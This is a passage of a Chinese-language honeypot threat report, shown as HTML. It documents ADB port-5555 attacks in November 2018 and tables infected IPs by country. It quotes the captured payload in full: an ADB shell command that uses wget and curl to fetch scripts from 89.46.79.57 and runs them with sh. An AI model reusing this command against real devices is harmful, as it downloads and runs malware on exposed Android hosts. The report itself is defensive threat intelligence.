<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">ASN information</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">ARUBA-ASN, IT</span>
</p>
</td>
</tr>
</tbody>
</table>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="border:none windowtext 1.0pt;color:#777777;font-family:inherit,serif;padding:0cm;"> </span></b><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span style="color:#777777;font-family:宋体;">通过我们的蜜网威胁感知系统可以看到,有很多被感染</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">IP</span><span style="color:#777777;font-family:宋体;">从</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">2018</span><span style="color:#777777;font-family:宋体;">年</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">11</span><span style="color:#777777;font-family:宋体;">月</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">20</span><span style="color:#777777;font-family:宋体;">日</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"> ~ 2018</span><span style="color:#777777;font-family:宋体;">年</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">11</span><span style="color:#777777;font-family:宋体;">月</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">26</span><span style="color:#777777;font-family:宋体;">日</span><span style="color:#777777;font-family:Lato,sans-serif;"> </span><span style="color:#777777;font-family:宋体;">持续对我们的蜜网节点</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"> 5555</span><span style="color:#777777;font-family:宋体;">端口发送攻击相同的</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Payload (</span><span style="color:#777777;font-family:宋体;">下载地址为同一个</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">IP)</span>
</p>
<div style="background:#F8F8F8;border:solid #E2E2E2 1.0pt;padding:2.0pt 6.0pt 2.0pt 6.0pt;">
<p align="left" style="background:#F8F8F8;border:none;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:7.5pt;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;">CNXN\x00\x00\x00\x01\x00\x10\x00\x00\x07\x00\x00\x002\x02\x00\x00\xbc\xb1\xa7\xb1host::\x00OPEN\x82\x00\x00\x00\x00\x00\x00\x00\xbf\x00\x00\x00\xa69\x00\x00\xb0\xaf\xba\xb1shell:cd /data/local/tmp;wget http://89.46.79.57/br -O- >br;sh br;busybox wget http://89.46.79.57/r -O- >r;sh r;curl http://89.46.79.57/c >c;sh c;busybox curl http://89.46.79.57/bc >bc;sh bc\x00</span>
</p>
</div>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Cambria,serif;"> </span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:15.0pt;">部分被感染</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:15.0pt;">IP</span></b>
</p>
<table border="1" cellpadding="0" cellspacing="0" width="1079" style="background:white;border:none;border-collapse:collapse;font-family:等线;font-size:10.5pt;width:809.5pt;">
<tbody>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">IP</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">国家</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">89.205.77.219</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">马其顿</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">37.20.80.216</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">俄罗斯</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">119.77.145.243</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">中国台湾</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">168.228.251.67</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">智利</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">5.27.53.84</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">土耳其</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">196.87.14.121</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">摩洛哥</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">180.122.220.101</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">中国</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">178.245.229.208</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">土耳其</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">102.103.123.54</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">摩洛哥</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">118.44.121.120</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">韩国</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">178.75.3.113</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">俄罗斯</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">190.140.21.246</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">巴拿马</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">151.177.242.221</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">瑞典</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">105.190.206.16</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">摩洛哥</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">219.77.64.71</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">中国香港</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">5.27.53.84</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">土耳其</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">58.153.156.98</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">中国香港</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">1.170.138.31</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">中国台湾</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
</tbody>
</table>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="border:none windowtext 1.0pt;color:#777777;font-family:inherit,serif;padding:0cm;"> </span></b><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="border:none windowtext 1.0pt;color:#777777;font-family:inherit,serif;padding:0cm;"> </span></b><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:15.0pt;">被感染</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:15.0pt;">IP</span></b><b><span style="color:#1E1E1E;font-family:宋体;font-size:15.0pt;">在全球的分布情况</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:15.0pt;"></span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="border:none windowtext 1.0pt;color:#777777;font-family:inherit,serif;padding:0cm;"> </span></b><b><img width="554" height="285" src="https://www.2k8.org/content/uploadfile/202211/26/9c88ac05.png" alt="" style="vertical-align:middle;" /></b><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span style="color:#777777;font-family:宋体;">我们把样本下载</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">IP 89.46.79.57 </span><span style="color:#777777;font-family:宋体;">在我们的威胁感知系统里面查询,也发现了该</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">IP</span><span style="color:#777777;font-family:宋体;">在十月,十一月有针对</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"> 23</span><span style="color:#777777;font-family:宋体;">、</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">81</span><span style="color:#777777;font-family:宋体;">和</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">37215</span><span style="color:#777777;font-family:宋体;">端口的扫描行为。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US"> </span>
</p>
页:
[1]